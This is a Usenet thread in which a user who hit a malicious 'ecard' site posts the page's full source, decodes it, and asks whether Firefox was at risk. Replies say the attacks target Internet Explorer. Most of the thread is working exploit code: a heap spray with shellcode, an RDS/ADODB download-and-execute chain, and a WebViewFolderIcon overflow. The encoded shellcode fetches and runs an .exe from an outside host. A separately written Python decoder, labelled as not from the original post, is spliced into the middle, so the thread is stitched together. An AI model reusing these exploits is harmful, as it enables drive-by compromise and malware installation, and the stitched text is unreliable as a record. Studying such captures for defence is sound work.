
Could this exploit code from a malware site affect Firefox?


OMA

Jun 24, 2007, 10:49:30 PM
Hello, I've accidentally entered a malware site by following an e-mail link
to www.duhymn.hk (be careful NOT to enter that site with a browser).
When I entered the site with Firefox 2.0.0.4, the browser immediately froze,
so I had to manually terminate it with the Task Manager (Windows XP).
Then I thought that it could be a malware site, so I tried to download
its main page outside any browser to avoid executing it again.

I got the following code from the "index.htm" page:
___

<html>
<body>
<script>
document.write(unescape("%3c%73%63%72%69%70%74%3e%0a%74%72%79%7b%78%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25
%75%30%30%65%38%25%75%30%30%30%30%25%75%35%64%30%30%25%75%65%64%38%31%25%75%31%31%63%65
%25%75%30%30%34%30%25%75%63%63%65%38%25%75%30%30%30%30%25%75%38%64%30%30%25%75%35%65%38
%35%25%75%34%30%31%32%25%75%65%38%30%30%25%75%30%30%30%37%25%75%30%30%30%30%25%75%37%32
%37%35%25%75%36%64%36%63%25%75%36%65%36%66%25%75%65%38%30%30%25%75%30%31%31%65%25%75%30
%30%30%30%25%75%63%33%38%39%25%75%38%35%38%64%25%75%31%33%31%65%25%75%30%30%34%30%25%75
%31%33%65%38%25%75%30%30%30%30%25%75%35%35%30%30%25%75%34%63%35%32%25%75%36%66%34%34%25
%75%36%65%37%37%25%75%36%66%36%63%25%75%36%34%36%31%25%75%36%66%35%34%25%75%36%39%34%36
%25%75%36%35%36%63%25%75%30%30%34%31%25%75%65%38%35%33%25%75%30%30%66%38%25%75%30%30%30
%30%25%75%39%30%39%30%25%75%38%64%38%64%25%75%31%32%37%66%25%75%30%30%34%30%25%75%30%30
%36%61%25%75%30%30%36%61%25%75%30%39%65%38%25%75%30%30%30%30%25%75%36%33%30%30%25%75%35
%63%33%61%25%75%32%65%37%34%25%75%36%65%36%39%25%75%30%30%37%38%25%75%36%61%35%31%25%75
%66%66%30%30%25%75%38%64%64%30%25%75%36%62%38%35%25%75%34%30%31%32%25%75%36%61%30%30%25
%75%65%38%30%30%25%75%30%30%30%39%25%75%30%30%30%30%25%75%33%61%36%33%25%75%37%34%35%63
%25%75%36%39%32%65%25%75%37%38%36%65%25%75%65%38%30%30%25%75%30%30%62%65%25%75%30%30%30
%30%25%75%38%35%38%64%25%75%31%32%37%33%25%75%30%30%34%30%25%75%30%30%36%61%25%75%62%31
%65%38%25%75%30%30%30%30%25%75%34%63%30%30%25%75%36%31%36%66%25%75%34%63%36%34%25%75%36
%32%36%39%25%75%36%31%37%32%25%75%37%39%37%32%25%75%30%30%34%31%25%75%36%39%35%37%25%75
%34%35%36%65%25%75%36%35%37%38%25%75%30%30%36%33%25%75%37%38%34%35%25%75%37%34%36%39%25
%75%37%32%35%30%25%75%36%33%36%66%25%75%37%33%36%35%25%75%30%30%37%33%25%75%37%34%36%38
%25%75%37%30%37%34%25%75%32%66%33%61%25%75%37%32%32%66%25%75%37%34%36%36%25%75%37%35%36
%38%25%75%32%65%36%34%25%75%36%66%36%33%25%75%32%66%36%64%25%75%36%31%36%64%25%75%32%65
%36%65%25%75%37%38%36%35%25%75%30%30%36%35%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30
%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%36%30%30%30%25%75
%38%62%36%34%25%75%33%30%31%64%25%75%30%30%30%30%25%75%38%62%30%30%25%75%30%63%35%62%25
%75%35%62%38%62%25%75%38%62%31%63%25%75%38%62%31%62%25%75%30%38%35%62%25%75%64%61%38%39
%25%75%39%64%38%39%25%75%31%33%32%64%25%75%30%30%34%30%25%75%37%62%38%62%25%75%30%31%33
%63%25%75%30%33%64%37%25%75%37%38%35%66%25%75%34%62%38%62%25%75%38%62%31%38%25%75%32%30
%37%33%25%75%37%62%38%62%25%75%30%31%32%34%25%75%30%31%64%36%25%75%66%63%64%37%25%75%30
%31%61%64%25%75%35%31%64%30%25%75%39%36%35%37%25%75%62%64%38%64%25%75%31%33%31%65%25%75
%30%30%34%30%25%75%30%66%62%39%25%75%30%30%30%30%25%75%66%33%30%30%25%75%39%36%61%36%25
%75%35%39%35%66%25%75%30%36%37%34%25%75%34%37%34%37%25%75%65%34%65%32%25%75%63%34%65%62
%25%75%63%30%33%31%25%75%38%62%36%36%25%75%63%31%30%37%25%75%30%32%65%30%25%75%37%33%38
%62%25%75%30%31%31%63%25%75%30%31%64%36%25%75%61%64%63%36%25%75%64%30%30%31%25%75%38%35
%38%39%25%75%31%33%33%31%25%75%30%30%34%30%25%75%63%33%36%31%25%75%66%66%35%30%25%75%32
%64%62%35%25%75%34%30%31%33%25%75%66%66%30%30%25%75%33%31%39%35%25%75%34%30%31%33%25%75
%66%66%30%30%25%75%34%37%65%30%25%75%37%34%36%35%25%75%37%32%35%30%25%75%36%33%36%66%25
%75%36%34%34%31%25%75%37%32%36%34%25%75%37%33%36%35%25%75%30%30%37%33%25%75%30%30%30%30
%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%22%29%3b%79%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%30%64%30%64%25%75%30%64%30%64%22%29%3b%77%68%69%6c%65%28%79%2e%6c%65
%6e%67%74%68%3c%30%78%34%30%30%30%30%29%79%2b%3d%79%3b%79%3d%79%2e%73%75%62%73%74%72%69
%6e%67%28%30%2c%30%78%33%66%66%65%34%2d%78%2e%6c%65%6e%67%74%68%29%3b%6f%3d%6e%65%77%20
%41%72%72%61%79%28%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%34%35%30%3b%69%2b%2b%29%6f%5b%69
%5d%3d%79%2b%78%3b%7a%3d%4d%61%74%68%2e%63%65%69%6c%28%30%78%64%30%64%30%64%30%64%29%3b
%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73
%69%64%3d%22%43%4c%53%49%44%3a%45%43%34%34%34%43%42%36%2d%33%45%37%45%2d%34%38%36%35%2d
%42%31%43%33%2d%30%44%45%37%32%45%46%33%39%42%33%46%22%3e%3c%5c%2f%6f%62%6a%65%63%74%3e
%27%29%3b%7a%3d%64%6f%63%75%6d%65%6e%74%2e%73%63%72%69%70%74%73%5b%30%5d%2e%63%72%65%61
%74%65%43%6f%6e%74%72%6f%6c%52%61%6e%67%65%28%29%2e%6c%65%6e%67%74%68%3b%7d%63%61%74%63
%68%28%65%29%7b%7d%0a%3c%2f%73%63%72%69%70%74%3e"));
</script>
<script>
document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d
%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61
%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d%22%20%77%69
%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a
%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33%2e%68%74%6d%22%20%77%69%64%74%68%3d
%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%73%74%79
%6c%65%3e%20%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%31%32%33%2e%68%74%6d%22%29
%7d%20%3c%2f%73%74%79%6c%65%3e%0a"));
</script>
We are currently testing a new browser feature. If you are not able to view
this ecard, please <a href="/ecard.exe">click here</a> to view in its
original format.
</body>
</html>
___

The fact that the code is obfuscated like this hints that it's a malware
site. After "unescaping" both encoded lines, I got the following code:
___

<html>
<body>
<script>
try{x=unescape("%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%ued81%u11ce%u0040%ucce8%u0000
%u8d00%u5e85%u4012%ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011e%u0000%uc389%u858d%u131e
%u0040%u13e8%u0000%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041%ue853%u00f8
%u0000%u9090%u8d8d%u127f%u0040%u006a%u006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078%u6a51
%uff00%u8dd0%u6b85%u4012%u6a00%ue800%u0009%u0000%u3a63%u745c%u692e%u786e%ue800%u00be%u0000
%u858d%u1273%u0040%u006a%ub1e8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6957%u456e
%u6578%u0063%u7845%u7469%u7250%u636f%u7365%u0073%u7468%u7074%u2f3a%u722f%u7466%u7568%u2e64
%u6f63%u2f6d%u616d%u2e6e%u7865%u0065%u0000%u0000%u0000%u0000%u0000%u0000%u6000%u8b64%u301d
%u0000%u8b00%u0c5b%u5b8b%u8b1c%u8b1b%u085b%uda89%u9d89%u132d%u0040%u7b8b%u013c%u03d7%u785f
%u4b8b%u8b18%u2073%u7b8b%u0124%u01d6%ufcd7%u01ad%u51d0%u9657%ubd8d%u131e%u0040%u0fb9%u0000
%uf300%u96a6%u595f%u0674%u4747%ue4e2%uc4eb%uc031%u8b66%uc107%u02e0%u738b%u011c%u01d6%uadc6
%ud001%u8589%u1331%u0040%uc361%uff50%u2db5%u4013%uff00%u3195%u4013%uff00%u47e0%u7465%u7250
%u636f%u6441%u7264%u7365%u0073%u0000%u0000%u0000%u0000");
y=unescape("%u0d0d%u0d0d");
while(y.length<0x40000)y+=y;y=y.substring(0,0x3ffe4-x.length);
o=new Array();for(i=0;i<450;i++)o[i]=y+x;z=Math.ceil(0xd0d0d0d);
document.write('<object></object>');
z=document.scripts[0].createControlRange().length;}catch(e){}
</script>
<iframe src="exp1.htm"></iframe>
<iframe src="exp2.htm"></iframe>
<iframe src="exp3.htm"></iframe>
<style> * {CURSOR: url("123.htm")} </style>
We are currently testing a new browser feature. If you are not able to view
this ecard, please <a href="/ecard.exe">click here</a> to view in its
original format.
</body>
</html>
___

So as you can see there is yet another unescape line with encoded stuff even
after decoding the previous unescape lines. I don't know how to decode this
latter unescape line, since it has a different encoding. The iframes contain
three pages named "exp1.htm", "exp2.htm" and "exp3.htm" ("exp" probably
stands for "exploit") which contain even more unescape("%") lines with
encoded stuff. After decoding the text included inside those unescape lines,
I got the following:

From the "exp1.htm" page:
___

<html>
<body>
<script>

// S мент рий н х :) -->
var xname='ob'+'j';
var obj_RDS = document.createElement(xname+'ect');
var ids='i'+'d';
var xrds='R'+'DS';
obj_RDS.setAttribute(ids,'obj_'+xrds);

var cls_id1='cl'+'si'+'d:BD'+'96C5';
var cls_id2='56'+'-65'+'A3-11'+'D0-983A'+'-00C04'+'FC29E36';
obj_RDS.setAttribute('classid',cls_id1+cls_id2);

var is__obj_adodb = 0;
// S мент рий н х :) -->
var xname_str="ad"+"odb.s"+"tream";
try { var obj_adodb = obj_RDS.CreateObject(xname_str,"");
is__obj_adodb = 1; } catch(e){} if (is__obj_adodb != 1)
{ try { var obj_adodb = new ActiveXObject(xname_str); is__obj_adodb = 1; }
catch(e){} }
if (is__obj_adodb == 1) { try {
var appl_="Sh"+"el"+"l.App"+"lica"+"tion";
var obj_ShellApp = obj_RDS.CreateObject(appl_,"");
var xml_name="ms"+"xm"+"l2.X"+"MLH"+"TTP";
var obj_msxml2 = new ActiveXObject(xml_name);
// S мент рий н х :) -->
obj_msxml2.open("G"+"ET","%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%ued81%u11ca%u0040%ucbe8
%u0000%u8d00%u5a85%u4012%ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011d%u0000%uc389%u858d
%u1319%u0040%u13e8%u0000%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041%ue853
%u00f7%u0000%u9090%u8d8d%u127a%u0040%u006a%u006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078
%u6a51%uff00%u8dd0%u6785%u4012%u6a00%ue800%u0009%u0000%u3a63%u745c%u692e%u786e%ue800%u00bd
%u0000%u858d%u126f%u0040%u006a%ub0e8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6957
%u456e%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u6800%u7474%u3a70%u2f2f%u6672%u6874%u6475
%u632e%u6d6f%u6d2f%u6e61%u652e%u6578%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6460%u1d8b
%u0030%u0000%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u8908%u89da%u289d%u4013%u8b00%u3c7b%ud701%u5f03
%u8b78%u184b%u738b%u8b20%u247b%ud601%ud701%uadfc%ud001%u5751%u8d96%u19bd%u4013%ub900%u000f
%u0000%ua6f3%u5f96%u7459%u4706%ue247%uebe4%u31c4%u66c0%u078b%ue0c1%u8b02%u1c73%ud601%uc601
%u01ad%u89d0%u2c85%u4013%u6100%u50c3%ub5ff%u1328%u0040%u95ff%u132c%u0040%ue0ff%u6547%u5074
%u6f72%u4163%u6464%u6572%u7373%u0000%u0000%u0000%u0000%u9000",false);

// S мент рий н х :) -->

obj_msxml2.send();
obj_adodb.type = 1;
obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);

// S мент рий н х :) -->

var fn = "C:\\xx1232255"+".e"+"xe"; obj_adodb.SaveToFile(fn,2);
obj_adodb.close(); obj_ShellApp.ShellExecute(fn); } catch(e){} } </script>
</body>
</html>
___

From the "exp2.htm" page:
___

<script>
function CreateO(o, n)
{ var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) { try { eval('r = o.CreateObject(n, "")') }
catch(e){} } if (! r)
{ try { eval('r = o.CreateObject(n, "", "")') }
catch(e){} } if (! r)
{ try { eval('r = o.GetObject("", n)') }catch(e){} }
if (! r) { try { eval('r = o.GetObject(n, "")') }catch(e){} }
if (! r) { try { eval('r = o.GetObject(n)') }catch(e){} } return(r); }
function Go(a) {
var xml_namea="ms"+"xm"+"l2"+".XM"+"L"+"HT"+"TP";
var obj_msxml2 = CreateO(a,xml_namea);
obj_msxml2.open("GE"+"T","%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%ued81%u11ca%u0040%ucbe8
%u0000%u8d00%u5a85%u4012%ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011d%u0000%uc389%u858d
%u1319%u0040%u13e8%u0000%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041%ue853
%u00f7%u0000%u9090%u8d8d%u127a%u0040%u006a%u006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078
%u6a51%uff00%u8dd0%u6785%u4012%u6a00%ue800%u0009%u0000%u3a63%u745c%u692e%u786e%ue800%u00bd
%u0000%u858d%u126f%u0040%u006a%ub0e8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6957
%u456e%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u6800%u7474%u3a70%u2f2f%u6672%u6874%u6475
%u632e%u6d6f%u6d2f%u6e61%u652e%u6578%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6460%u1d8b
%u0030%u0000%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u8908%u89da%u289d%u4013%u8b00%u3c7b%ud701%u5f03
%u8b78%u184b%u738b%u8b20%u247b%ud601%ud701%uadfc%ud001%u5751%u8d96%u19bd%u4013%ub900%u000f
%u0000%ua6f3%u5f96%u7459%u4706%ue247%uebe4%u31c4%u66c0%u078b%ue0c1%u8b02%u1c73%ud601%uc601
%u01ad%u89d0%u2c85%u4013%u6100%u50c3%ub5ff%u1328%u0040%u95ff%u132c%u0040%ue0ff%u6547%u5074
%u6f72%u4163%u6464%u6572%u7373%u0000%u0000%u0000%u0000%u9000",false);
obj_msxml2.send();
var ad_name="ad"+"od"+"b."+"str"+"eam";
var obj_adodb = CreateO(a,ad_name);
obj_adodb.type = 1; obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
var fn = "C:\\88996661.exe";
obj_adodb.SaveToFile(fn,2);
var s = CreateO(a, "Sh"+"el"+"l.Ap"+"plicat"+"ion");
s.ShellExecute(fn); return TRUE; }
var i = 0;
var x1='{BD9'+'6C556-65A'+'3-11D0-983A-0'+'0C04F'+'C29E30}';
var x2='{B'+'D96C556-65A3'+'-11D0-983A-00'+'C04FC2'+'9E36}';
var x3='{AB9B'+'CEDD-EC'+'7E-47E1-93'+'22-D4A210617116}';
var x4='{0006F0'+'33-0000-00'+'00-C000-0000'+'00000046}';
var x5='{0006F03A-0000-00'+'00-C000-000000000046}';
var x6='{6e32070a-766d-4e'+'e6-879c-dc1f'+'a91d2fc3}';
var x7='{6'+'414512'+'B-B978-451D-A0D8-FCFDF33E833C}';
var x8='{7F5B'+'7F63-F06F'+'-4331-8A26-339E0'+'3C0AE3D}';
var x9='{06723E09-F4C'+'2-43c8-8358-09FCD'+'1DB0766}';
var x10='{639F725'+'F-1B2D-4831-A9'+'FD-874847682010}';
var x11='{BA0185'+'99-1DB3-44f9-83B'+'4-461454C84BF8}';
var x12='{D0C07D'+'56-7C69-43F1-B4'+'A0-25F5A11FAB19}';
vae x13='{E8CCC'+'DDF-CA28-496b-B'+'050-6C07C962'+'476B}';
var t = new Array( x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12,
x13,null);
while (t[i]) { var a = null; if (t[i].substring(0,1) == '{') { a =
document.createElement("object"); a.setAttribute("cl"+"ass"+"id",
"cls"+"id:" + t[i].substring(1, t[i].length - 1)); }
else { try { a = new ActiveXObject(t[i]); } catch(e){} } if (a) { try { var
b = CreateO(a, "Sh"+"ell.Ap"+"plication");
if (b) { if (Go(a)) break; } }catch(e){} } i++; } </script>
___

From the "exp3.htm" page:
___

<script>
var heapSprayToAddress = 0x05050505;
var shellcode =
unescape("%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%ued81%u11ca
%u0040%ucbe8%u0000%u8d00%u5a85%u4012%ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011d%u0000
%uc389%u858d%u1319%u0040%u13e8%u0000%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c
%u0041%ue853%u00f7%u0000%u9090%u8d8d%u127a%u0040%u006a%u006a%u09e8%u0000%u6300%u5c3a%u2e74
%u6e69%u0078%u6a51%uff00%u8dd0%u6785%u4012%u6a00%ue800%u0009%u0000%u3a63%u745c%u692e%u786e
%ue800%u00bd%u0000%u858d%u126f%u0040%u006a%ub0e8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972
%u0041%u6957%u456e%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u6800%u7474%u3a70%u2f2f%u6672
%u6874%u6475%u632e%u6d6f%u6d2f%u6e61%u652e%u6578%u0000%u0000%u0000%u0000%u0000%u0000%u0000
%u6460%u1d8b%u0030%u0000%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u8908%u89da%u289d%u4013%u8b00%u3c7b
%ud701%u5f03%u8b78%u184b%u738b%u8b20%u247b%ud601%ud701%uadfc%ud001%u5751%u8d96%u19bd%u4013
%ub900%u000f%u0000%ua6f3%u5f96%u7459%u4706%ue247%uebe4%u31c4%u66c0%u078b%ue0c1%u8b02%u1c73
%ud601%uc601%u01ad%u89d0%u2c85%u4013%u6100%u50c3%ub5ff%u1328%u0040%u95ff%u132c%u0040%ue0ff
%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u0000%u0000%u0000%u0000%u9000");
var heapBlockSize = 0x400000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0505%u0505");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
for ( i = 0 ; i < 128 ; i++)
{
try
{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
}
catch(e){}
}

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

</script>
___

I'm not savvy enough to tell what all that code does. It seems it tries to
download and execute an EXE file in the root dir of C: (named
"C:\88996661.exe") but I haven't found that file in my computer (maybe I
terminated Firefox before it could download the EXE file, but I'm not sure
if that code could do any other harmful thing to my system).

I'd like to know if that code could exploit any vulnerability in Firefox,
and thus if it may have affected my system. I was running as an Admin user
when that happened. My antivirus doesn't seem to find anything.

Thank you,
OMA
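The two encodings OMA ran into can be peeled apart without ever loading the page in a browser, which is the safe way to triage a capture like this. The script below is an added example for this thread, not code from the original post: `js_unescape` emulates JavaScript's `unescape()` for both the `%XX` form (the outer layer of the quoted index.htm) and the `%uXXXX` form (the inner shellcode string), `code_units_to_bytes` lays the decoded code units out as they would sit in memory, and `printable_strings` pulls out the readable API names and URLs that such payloads normally carry in the clear. `PAGE_PREFIX` is copied from the first escapes of the quoted index.htm; `INNER` and `SAMPLE_HTML` are constructed samples, and the function names are this example's own.

```python
"""Decode the nested unescape() layers found in pages like the one quoted
above and pull readable strings out of %uXXXX shellcode, without running
the script. Added example for this thread, not code from the original
post; the samples below are constructed except where noted."""
import re

# One regex for both escape forms JavaScript's unescape() understands.
_ESC = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')
# The argument of an unescape("...") call. Quotes inside the literal are
# themselves escaped (%22) in this kind of loader, so a non-quote run suffices.
_UNESCAPE_CALL = re.compile(r'unescape\(\s*"([^"]*)"\s*\)')


def js_unescape(s: str) -> str:
    """Emulate JavaScript unescape(): %uXXXX gives a UTF-16 code unit,
    %XX gives code point 0..255, everything else passes through."""
    def repl(m):
        hex4, hex2 = m.groups()
        return chr(int(hex4 or hex2, 16))
    return _ESC.sub(repl, s)


def code_units_to_bytes(s: str) -> bytes:
    """Lay each 16-bit code unit out little-endian, which is how a sprayed
    JavaScript string sits in the memory of a 32-bit x86 browser."""
    out = bytearray()
    for ch in s:
        cu = ord(ch)
        out += bytes((cu & 0xFF, cu >> 8))
    return bytes(out)


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII: API names and URLs inside shellcode are
    usually stored in the clear and show what the payload is meant to do."""
    pattern = rb'[\x20-\x7e]{%d,}' % min_len
    return [r.decode('ascii') for r in re.findall(pattern, data)]


def peel_layers(html: str, max_depth: int = 4) -> list:
    """Decode the first unescape("...") literal, then look for another
    unescape() inside the result, up to max_depth layers deep."""
    layers, cur = [], html
    for _ in range(max_depth):
        m = _UNESCAPE_CALL.search(cur)
        if not m:
            break
        cur = js_unescape(m.group(1))
        layers.append(cur)
    return layers


def analyse(html: str) -> dict:
    """Triage summary for one captured page: how many layers were peeled,
    what readable strings the innermost payload holds, and how much of the
    page is percent-escapes (a crude obfuscation indicator)."""
    layers = peel_layers(html)
    payload = code_units_to_bytes(layers[-1]) if layers else b''
    escaped = sum(len(m.group(0)) for m in _ESC.finditer(html))
    return {
        'layers': len(layers),
        'strings': printable_strings(payload),
        'escape_count': len(_ESC.findall(html)),
        'escape_fraction': escaped / max(len(html), 1),
        'write_unescape': bool(re.search(r'document\.write\s*\(\s*unescape', html)),
    }


# Sample 1 (copied from the start of the quoted index.htm): the outer layer
# is plain %XX encoding of HTML source.
PAGE_PREFIX = "%3c%73%63%72%69%70%74%3e%0a%74%72%79%7b"

# Sample 2 (constructed): a loader that hides a %u-encoded string inside a
# %XX-encoded script, mirroring the two-layer structure of the quoted page.
# The inner data is four 0x90 bytes followed by the word "Hello".
INNER = 'x=unescape("%u9090%u9090%u6548%u6c6c%u006f");'
SAMPLE_HTML = ('<script>document.write(unescape("'
               + ''.join('%%%02x' % ord(c) for c in INNER)
               + '"));</script>')

if __name__ == '__main__':
    print(repr(js_unescape(PAGE_PREFIX)))
    print(analyse(SAMPLE_HTML))
```

Run against a real capture, `analyse()` will report the download URL and the Windows API names the inner string carries, which is what tells you what the payload would have tried to fetch and execute; the `%u` pairs are byte-swapped in the source, so reading them by eye is unreliable and the little-endian step above is what makes the strings line up.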

Chris Jahn

Jun 24, 2007, 11:00:23 PM
"OMA" <omo...@inicia.es> wrote in
news:qfqdnQjMOOgmsOLb...@mozilla.org:

> I'd like to know if that code could exploit any vulnerability
> in Firefox, and thus if it may have affected my system.

No. In IE, clicking on the executable would run it. In FF, you
can only download an executable file, then you have to browse to
the saved file and click it yourself, manually.

--
Mozilla & Netscape FAQs: http://www.ufaq.org/
Mozilla/Firefox/Thunderbird/Seamonkey solutions: http://ilias.ca/
Web page validation: http://validator.w3.org
About Mozilla: http://www.mozilla.org

Ambition is a poor excuse for not having the good sense to be
lazy.

Aggro

Jun 25, 2007, 10:48:44 AM
OMA wrote:
> Hello, I've accidentally entered a malware site by following an e-mail link
> to www.duhymn.hk (be careful NOT to enter that site with a browser).
> When I entered the site with Firefox 2.0.0.4, the browser immediately
> froze,

There seems to be a large loop. That probably caused your browser to
freeze. Freezing is not an indication that they managed to do something to
your computer.

It looks like "Internet Explorer createControlRange Object Buffer
Overflow":
http://www.juniper.net/security/auto/vulnerabilities/vuln1850.html

So probably only IE users are in danger. I didn't read the whole code,
so I don't know if there is something else also. But I very much doubt
that you would be in danger as you were using 2.0.0.4.


--
Solutions for issues with Firefox:
http://kb.mozillazine.org/Category:Issues_%28Firefox%29
